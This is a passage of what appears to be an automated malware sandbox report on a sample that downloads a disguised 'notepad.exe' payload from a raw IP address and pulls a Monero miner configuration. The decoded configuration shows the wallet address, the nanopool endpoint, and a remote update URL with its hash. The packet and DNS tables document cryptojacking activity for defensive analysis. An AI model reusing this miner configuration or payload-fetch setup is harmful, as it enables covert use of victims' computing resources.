Jul 23, 2021 22:25:17.645678997 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:25:17.646522999 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:25:17.761609077 CEST	14444	49767	142.44.242.100	192.168.2.4
Jul 23, 2021 22:25:17.930897951 CEST	14444	49767	142.44.242.100	192.168.2.4
Jul 23, 2021 22:25:17.981698990 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:25:21.114352942 CEST	14444	49767	142.44.242.100	192.168.2.4
Jul 23, 2021 22:25:21.169476032 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:25:21.470091105 CEST	80	49766	45.144.225.135	192.168.2.4
Jul 23, 2021 22:25:21.470192909 CEST	49766	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:25:57.072720051 CEST	14444	49767	142.44.242.100	192.168.2.4
Jul 23, 2021 22:25:57.125986099 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:26:10.663814068 CEST	49766	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:26:10.692378044 CEST	80	49766	45.144.225.135	192.168.2.4
Jul 23, 2021 22:26:24.201551914 CEST	14444	49767	142.44.242.100	192.168.2.4
Jul 23, 2021 22:26:24.300199032 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:26:39.021787882 CEST	49767	14444	192.168.2.4	142.44.242.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 23, 2021 22:23:51.405318022 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:52.054436922 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:52.079669952 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:52.910460949 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:52.946580887 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:53.567579985 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:53.599538088 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:54.640368938 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:54.669636011 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:55.364382982 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:55.393188000 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:56.088097095 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:56.126821041 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:57.400346041 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:57.429852962 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:58.603162050 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:58.631608009 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 23, 2021 22:23:59.579170942 CEST	51726	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:23:59.608146906 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:10.422729969 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:10.456058025 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:11.222333908 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:11.250494003 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:12.806771994 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:12.836539984 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:14.238660097 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:14.286999941 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:16.166198015 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:16.191339016 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:16.966397047 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:16.994210958 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:17.799937963 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:17.827893972 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:19.348121881 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:19.373182058 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:20.304687977 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:20.332789898 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:21.040370941 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:21.077286959 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:41.239518881 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:41.374176979 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:41.826210976 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:41.859472990 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:42.442461014 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:42.502144098 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:42.641177893 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:42.685779095 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:42.825552940 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:42.859935999 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:43.656379938 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:43.692810059 CEST	53	60875	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:44.368021965 CEST	56448	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:44.405517101 CEST	53	56448	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:45.024162054 CEST	59172	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:45.057226896 CEST	53	59172	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:45.987174988 CEST	62420	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:46.026623964 CEST	53	62420	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:47.199042082 CEST	60579	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:47.236224890 CEST	53	60579	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:48.513576031 CEST	50183	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:48.548228979 CEST	53	50183	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:55.317559958 CEST	61531	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:55.352516890 CEST	53	61531	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:55.470983028 CEST	49228	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:55.504194021 CEST	53	49228	8.8.8.8	192.168.2.4
Jul 23, 2021 22:24:57.046215057 CEST	59794	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:24:57.095211983 CEST	53	59794	8.8.8.8	192.168.2.4
Jul 23, 2021 22:25:17.485925913 CEST	55916	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:25:17.519257069 CEST	53	55916	8.8.8.8	192.168.2.4
Jul 23, 2021 22:25:31.999982119 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:25:32.040410042 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 23, 2021 22:25:35.512653112 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:25:35.554219961 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 23, 2021 22:26:05.723686934 CEST	60689	53	192.168.2.4	8.8.8.8
Jul 23, 2021 22:26:05.759340048 CEST	53	60689	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 23, 2021 22:25:17.485925913 CEST	192.168.2.4	8.8.8.8	0x71e5	Standard query (0)	xmr-us-east1.nanopool.org	A (IP address)	IN (0x0001)
Jul 23, 2021 22:26:05.723686934 CEST	192.168.2.4	8.8.8.8	0x8c1d	Standard query (0)	xmr-us-east1.nanopool.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jul 23, 2021 22:25:17.519257069 CEST	8.8.8.8	192.168.2.4	0x71e5	No error (0)	xmr-us-east1.nanopool.org	144.217.14.139	A (IP address)	IN (0x0001)
Jul 23, 2021 22:25:17.519257069 CEST	8.8.8.8	192.168.2.4	0x71e5	No error (0)	xmr-us-east1.nanopool.org	144.217.14.109	A (IP address)	IN (0x0001)
Jul 23, 2021 22:25:17.519257069 CEST	8.8.8.8	192.168.2.4	0x71e5	No error (0)	xmr-us-east1.nanopool.org	142.44.242.100	A (IP address)	IN (0x0001)
Jul 23, 2021 22:25:17.519257069 CEST	8.8.8.8	192.168.2.4	0x71e5	No error (0)	xmr-us-east1.nanopool.org	142.44.243.6	A (IP address)	IN (0x0001)
Jul 23, 2021 22:25:17.519257069 CEST	8.8.8.8	192.168.2.4	0x71e5	No error (0)	xmr-us-east1.nanopool.org	192.99.69.170	A (IP address)	IN (0x0001)
Jul 23, 2021 22:26:05.759340048 CEST	8.8.8.8	192.168.2.4	0x8c1d	No error (0)	xmr-us-east1.nanopool.org	192.99.69.170	A (IP address)	IN (0x0001)
Jul 23, 2021 22:26:05.759340048 CEST	8.8.8.8	192.168.2.4	0x8c1d	No error (0)	xmr-us-east1.nanopool.org	144.217.14.109	A (IP address)	IN (0x0001)
Jul 23, 2021 22:26:05.759340048 CEST	8.8.8.8	192.168.2.4	0x8c1d	No error (0)	xmr-us-east1.nanopool.org	142.44.242.100	A (IP address)	IN (0x0001)
Jul 23, 2021 22:26:05.759340048 CEST	8.8.8.8	192.168.2.4	0x8c1d	No error (0)	xmr-us-east1.nanopool.org	144.217.14.139	A (IP address)	IN (0x0001)
Jul 23, 2021 22:26:05.759340048 CEST	8.8.8.8	192.168.2.4	0x8c1d	No error (0)	xmr-us-east1.nanopool.org	142.44.243.6	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

45.144.225.135

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49750	45.144.225.135	80	C:\Users\user\Desktop\LZF5sOWnss.exe

Timestamp	kBytes transferred	Direction	Data
Jul 23, 2021 22:24:24.402663946 CEST	1506	OUT	GET /notepad.exe HTTP/1.1 Host: 45.144.225.135 Connection: Keep-Alive
Jul 23, 2021 22:24:24.436306000 CEST	1508	IN	HTTP/1.1 200 OK Date: Fri, 23 Jul 2021 20:24:24 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Fri, 23 Jul 2021 15:30:06 GMT ETag: "375a00-5c7cc13fa9b80" Accept-Ranges: bytes Content-Length: 3627520 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 e0 fa 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 37 00 00 30 00 00 00 00 00 00 92 47 37 00 00 20 00 00 00 60 37 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 47 37 00 57 00 00 00 00 60 37 00 20 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 37 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 27 37 00 00 20 00 00 00 28 37 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 2c 00 00 00 60 37 00 00 2e 00 00 00 2a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 37 00 00 02 00 00 00 58 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 47 37 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 2d 37 00 fc 19 00 00 03 00 00 00 1c 00 00 06 fc 33 00 00 40 f9 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1c 1e 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 17 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 15 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 19 2d 03 26 2b 07 28 0d 00 00 06 2b 00 2a 00 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 02 00 00 04 2c 0b 02 7b 02 00 00 04 6f 16 00 00 0a 02 03 1c 2d 04 26 26 2b 07 28 17 00 00 0a 2b 00 2a 00 03 30 04 00 4c 05 00 00 00 00 00 00 02 73 18 00 00 0a 1c 3a db 04 00 00 26 26 02 73 18 00 00 0a 19 3a d7 04 00 00 26 26 02 73 18 00 00 0a 19 3a d3 04 00 00 26 26 02 73 18 00 00 0a 17 3a cf 04 00 00 26 26 02 73 18 00 00 0a 1b 3a cb 04 00 00 26 26 02 73 18 00 00 0a 18 3a c7 04 00 00 26 26 02 73 18 00 00 0a 1c 3a c3 04 00 00 26 26 02 15 3a c4 04 00 00 26 02 7b 03 00 00 04 17 6f 19 00 00 0a 02 7b 03 00 00 04 16 16 73 1a 00 00 0a 6f 1b 00 00 0a 02 7b 03 00 00 04 72 01 00 00 70 6f 1c 00 00 0a 02 7b 03 00 00 04 1f 50 1f 11 73 1d 00 00 0a 6f 1e 00 00 0a 02 7b 03 00 00 04 16 6f 1f 00 00 0a 02 7b 03 00 00 04 72 01 00 00 70 6f 20 00 00 0a 02 7b 03 00 00 04 17 6f 21 00 00 0a 02 7b 03 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELX`(70G7 `7@ 7@8G7W`7 ,7 H.text'7 (7 `.rsrc ,`7.7@@.reloc7X7@BtG7H<-73@60-&(+&+0s(t-&++~0(-&+(+*******0',{,{o-&&+(+0Ls:&&s:&&s:&&s:&&s:&&s:&&s:&&:&{o{so{rpo{Pso{o{rpo {o!{
Jul 23, 2021 22:24:24.436355114 CEST	1509	IN	Data Raw: 04 02 fe 06 0b 00 00 06 73 22 00 00 0a 6f 23 00 00 0a 02 7b 04 00 00 04 17 6f 19 00 00 0a 02 7b 04 00 00 04 1e 1e 73 1a 00 00 0a 6f 1b 00 00 0a 02 7b 04 00 00 04 72 15 00 00 70 6f 1c 00 00 0a 02 7b 04 00 00 04 1f 50 1f 11 73 1d 00 00 0a 6f 1e 00 Data Ascii: s"o#{o{so{rpo{Pso{o{rpo {o!{s"o#{o{so{r)po{Pso{o{r)po
Jul 23, 2021 22:24:24.436386108 CEST	1510	IN	Data Raw: 00 0a 02 07 28 16 00 00 06 6f 39 00 00 0a 1b 2d 06 26 de 10 0b 2b da 0c 2b f8 06 2c 06 06 6f 16 00 00 0a dc 08 2a 00 00 00 01 10 00 00 02 00 18 00 39 51 00 0a 00 00 00 00 13 30 0a 00 57 00 00 00 02 00 00 11 28 3a 00 00 0a 03 6f 3b 00 00 0a 19 2d Data Ascii: (o9-&++,o9Q0W(:o;-B&rp~<o=-1&(>(? %(@u+++0B-&+5+oA(B(Co -&X-&+(D++2*0E
Jul 23, 2021 22:24:24.436400890 CEST	1512	IN	Data Raw: 72 5b 01 00 70 6f 1c 00 00 0a 02 7b 11 00 00 04 1f 23 1f 0d 73 1d 00 00 0a 6f 1e 00 00 0a 02 7b 11 00 00 04 1c 6f 1f 00 00 0a 02 7b 11 00 00 04 72 5b 01 00 70 6f 20 00 00 0a 02 7b 12 00 00 04 17 6f 19 00 00 0a 02 7b 12 00 00 04 18 6f 49 00 00 0a Data Ascii: r[po{#so{o{r[po {o{oI{ so{ripo{#so{o{ripo {o{oI{ so{rwpo{#s
Jul 23, 2021 22:24:24.436417103 CEST	1513	IN	Data Raw: 2b e7 28 4f 00 00 0a 2b 00 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1c 2d 08 26 28 4c 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 7e 18 00 00 04 2d 26 72 f3 01 00 70 d0 06 00 00 02 28 3e 00 00 0a 6f 50 00 Data Ascii: +(O+0-&(L+&+03~-&rp(>oPsQ-&++~~0-&++j(rOp~oRtj(rsp~oRtj(rp~oRtj(rp~
Jul 23, 2021 22:24:24.436445951 CEST	1514	IN	Data Raw: 00 00 00 b6 01 00 00 dd 00 00 00 1d 01 00 00 61 00 00 00 3a 01 00 00 00 00 00 00 a1 00 00 00 80 00 00 00 8c 03 00 00 22 61 00 66 00 67 00 68 00 61 00 6e 00 69 00 73 00 74 00 61 00 6e 00 5f 00 33 00 32 00 39 00 32 00 38 00 00 00 00 00 16 61 00 6c Data Ascii: a:"afghanistan_32928aland_32908#albania_32909algeria_32972american_32917andorra_32921angola
Jul 23, 2021 22:24:24.436464071 CEST	1516	IN	Data Raw: 33 39 20 35 2e 32 36 35 7a 6d 33 33 2e 32 32 34 20 34 30 2e 31 31 33 63 33 2e 39 37 34 20 31 2e 39 35 34 20 36 2e 39 39 20 36 2e 38 33 36 20 37 2e 31 39 20 31 30 2e 38 31 32 2e 33 33 36 20 34 2e 35 37 36 2e 39 39 36 20 38 2e 34 34 20 33 2e 30 35 Data Ascii: 39 5.265zm33.224 40.113c3.974 1.954 6.99 6.836 7.19 10.812.336 4.576.996 8.44 3.05 11.69-3.27-.91-4.837-6.124-5.302-11.118-.47-5.17-3.256-7.41-4.938-11.384zm8.29 9.576c2.75 5.077 6.597 7.013 6.794 10.78.333 4.335.662 4.557 1.837 8.82-3.237-.86
Jul 23, 2021 22:24:24.436480999 CEST	1517	IN	Data Raw: 20 2e 39 33 37 35 20 38 30 2e 30 30 32 20 30 29 22 2f 3e 0a 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 37 33 2e 38 36 37 20 33 35 35 2e 39 35 38 63 2e 31 32 34 2d 2e 38 39 2d 2e 34 38 32 2d 31 2e 36 36 36 2d 31 2e 32 31 2d 31 2e 39 2d 31 2e 34 32 2d Data Ascii: .9375 80.002 0)"/> <path d="M273.867 355.958c.124-.89-.482-1.666-1.21-1.9-1.42-.533-2.83-.967-4.237-1.368-1.6-.38-2.494.767-2.5 1.52-.007 1.254-.065 2.318 0 3.268.088 1.183.312 1.27 1.06 1.446 1.197.202 2.732.41 3.935 1.216.953.588 1.87.123
Jul 23, 2021 22:24:24.436496973 CEST	1519	IN	Data Raw: 22 23 66 66 66 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 73 74 72 6f 6b 65 3d 22 23 30 30 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 2e 39 37 33 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2e 39 33 Data Ascii: "#fff" fill-rule="evenodd" stroke="#000" stroke-width=".973" transform="matrix(.93752 0 0 .9375 80.002 0)"/> <path d="M253.884 223.61c-1.886-3.028-4.144 4.2-11.897 9.578-3.61 2.456-6.122 9-6.147 13.308-.119 2.956.329 5.906-.001 8.767-.209 1.
Jul 23, 2021 22:24:24.436512947 CEST	1520	IN	Data Raw: 34 35 20 31 2e 35 33 35 2d 31 2e 35 37 20 35 2e 34 30 37 2d 33 2e 31 31 33 20 34 2e 39 37 32 2d 33 2e 38 31 32 6c 2d 35 2e 31 39 34 2d 38 2e 33 34 33 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 Data Ascii: 45 1.535-1.57 5.407-3.113 4.972-3.812l-5.194-8.343z" fill="#fff" fill-rule="evenodd" stroke="#000" stroke-width=".492"/> <path d="M384.644 224.527c1.884-3.134 4.14 4.345 11.888 9.913 3.61 2.54 6.122 9.314 6.145 13.772.117 3.06-.33 6.114 0 9.
Jul 23, 2021 22:24:24.468187094 CEST	1521	IN	Data Raw: 66 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 2f 3e 0a 20 20 3c 67 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 31 30 2e 35 Data Ascii: f" fill-rule="evenodd"/> <g fill="#fff" fill-rule="evenodd"> <path d="M210.515 194.123h11.72v2.688h-11.72zm0 5.08h11.72v22.456h-11.72zm-.7-8.155l13 .076c.51-4.41-3.892-9.17-6.46-9.123-2.54.125-6.64 4.818-6.54 9.05zm77.695 3.132h11.72v2.6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49766	45.144.225.135	80	C:\Users\user\Desktop\LZF5sOWnss.exe

Timestamp	kBytes transferred	Direction	Data
Jul 23, 2021 22:25:16.437726021 CEST	10512	OUT	GET /config.txt HTTP/1.1 Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile User-Agent: WinInetGet/0.1 Host: 45.144.225.135 Connection: Keep-Alive Cache-Control: no-cache
Jul 23, 2021 22:25:16.468919992 CEST	10514	IN	HTTP/1.1 200 OK Date: Fri, 23 Jul 2021 20:25:16 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Fri, 23 Jul 2021 15:42:46 GMT ETag: "776-5c7cc41474980" Accept-Ranges: bytes Content-Length: 1910 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain; charset=UTF-8 Data Raw: 5b 4d 69 6e 65 72 5d 0a 61 64 64 72 65 73 73 3d 34 38 51 62 50 5a 55 74 57 6d 38 67 47 36 54 36 65 67 36 48 37 4a 47 58 61 44 36 65 4e 4a 48 38 6f 33 52 6f 79 4c 67 42 65 71 79 6d 37 54 78 79 64 55 39 54 66 4d 66 55 55 67 61 68 65 71 61 37 42 46 64 68 74 66 62 39 64 36 36 35 43 67 59 44 6a 36 66 35 4b 76 64 6a 4c 65 47 4a 6d 64 57 2e 57 4f 52 4b 45 52 2f 70 69 63 6b 74 75 74 6f 73 09 09 09 3b 20 58 4d 52 20 61 64 64 72 65 73 73 2c 20 65 6d 61 69 6c 20 28 6d 69 6e 65 72 67 61 74 65 29 2c 20 62 74 63 20 61 64 64 72 65 73 73 20 28 6e 69 63 65 68 61 73 68 29 2c 20 65 74 63 2e 0a 70 6f 6f 6c 70 6f 72 74 3d 78 6d 72 2d 75 73 2d 65 61 73 74 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 3a 31 34 34 34 34 09 09 3b 20 44 6f 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 73 74 72 61 74 75 6d 2b 74 63 70 3a 2f 2f 27 20 65 2e 67 20 6d 6f 6e 65 72 6f 68 61 73 68 2e 63 6f 6d 3a 33 33 33 33 0a 70 61 73 73 77 6f 72 64 3d 09 09 09 09 3b 20 50 6f 6f 6c 20 70 61 73 73 77 6f 72 64 0a 73 74 6f 70 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 74 6f 20 73 74 6f 70 20 6d 69 6e 65 72 2e 20 49 66 20 6e 6f 74 20 73 70 65 63 69 66 69 65 64 20 6f 72 20 65 71 75 61 6c 20 74 6f 20 22 30 22 20 6d 69 6e 65 72 20 77 69 6c 6c 20 77 6f 72 6b 2e 20 0a 70 72 6f 78 79 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 69 66 20 79 6f 75 20 61 72 65 20 6d 69 6e 69 6e 67 20 74 6f 20 78 6d 72 69 67 2d 70 72 6f 78 79 20 69 6e 73 74 65 61 64 20 6f 66 20 70 6f 6f 6c 2e 20 54 68 69 73 20 65 6e 61 62 6c 65 73 20 75 73 69 6e 67 20 61 20 75 6e 71 69 75 65 20 61 64 64 72 65 73 73 20 70 65 72 20 77 6f 72 6b 65 72 20 66 6f 72 20 62 65 74 74 65 72 20 6d 69 6e 65 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 2e 0a 6b 65 65 70 61 6c 69 76 65 3d 30 09 09 09 09 3b 20 30 20 74 6f 20 64 69 73 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 2c 20 31 20 74 6f 20 65 6e 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 0a 0a 5b 55 70 64 61 74 65 5d 0a 3b 63 6f 6e 66 69 67 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 78 6d 72 6d 69 6e 65 72 2e 6e 65 74 2f 63 6f 6e 66 69 67 2e 74 78 74 20 20 20 09 3b 20 59 6f 75 20 63 61 6e 20 75 70 64 61 74 65 20 74 68 65 20 75 72 6c 20 74 68 61 74 20 70 6f 69 6e 74 73 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 69 6c 65 2e 20 4d 75 73 74 20 62 65 67 69 6e 20 77 69 74 68 20 22 68 74 74 70 3a 2f 2f 22 20 6f 72 20 22 68 74 74 70 73 3a 2f 2f 22 20 0a 6b 6e 6f 63 6b 5f 74 69 6d 65 3d 33 30 20 09 09 09 09 20 20 20 20 20 09 3b 20 4e 75 6d 62 65 72 20 6f 66 20 6d 69 6e 75 74 65 73 20 74 68 65 20 6d 69 6e 65 72 20 77 61 69 74 73 20 62 65 74 77 65 65 6e 20 76 69 73 69 74 73 20 74 6f 20 63 6f 6e 66 69 67 20 66 69 6c 65 2e 20 49 66 20 6e 65 76 65 72 20 73 70 65 63 69 66 69 65 64 2c 20 64 65 66 61 75 6c 74 20 69 73 20 33 30 20 6d 69 6e 75 74 65 73 2e 20 0a 75 70 64 61 74 65 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 34 35 2e 31 34 34 2e 32 32 35 2e 31 33 35 2f 6e 6f 74 65 70 61 64 2e 65 78 65 09 09 3b 20 75 72 6c 20 6f 66 20 6e 65 77 20 6d 69 6e 65 72 2e 20 4d 69 6e 65 72 20 77 69 6c Data Ascii: [Miner]address=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos; XMR address, email (minergate), btc address (nicehash), etc.poolport=xmr-us-east1.nanopool.org:14444; Do not include 'stratum+tcp://' e.g monerohash.com:3333password=; Pool passwordstop=0; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work. proxy=0; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.keepalive=0; 0 to disable keepalive, 1 to enable keepalive[Update];config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://" knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes. update_url=http://45.144.225.135/notepad.exe; url of new miner. Miner wil
Jul 23, 2021 22:25:16.468975067 CEST	10515	IN	Data Raw: 6c 20 67 65 74 20 75 70 64 61 74 65 64 20 77 69 74 68 20 74 68 69 73 20 66 69 6c 65 2e 20 0a 75 70 64 61 74 65 5f 68 61 73 68 3d 64 35 37 32 64 61 39 32 30 32 31 39 36 31 32 31 64 39 35 32 32 33 31 66 32 36 64 36 35 64 30 37 09 09 09 09 3b 20 6d Data Ascii: l get updated with this file. update_hash=d572da9202196121d952231f26d65d07; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!;End

Code Manipulations

Statistics

CPU Usage
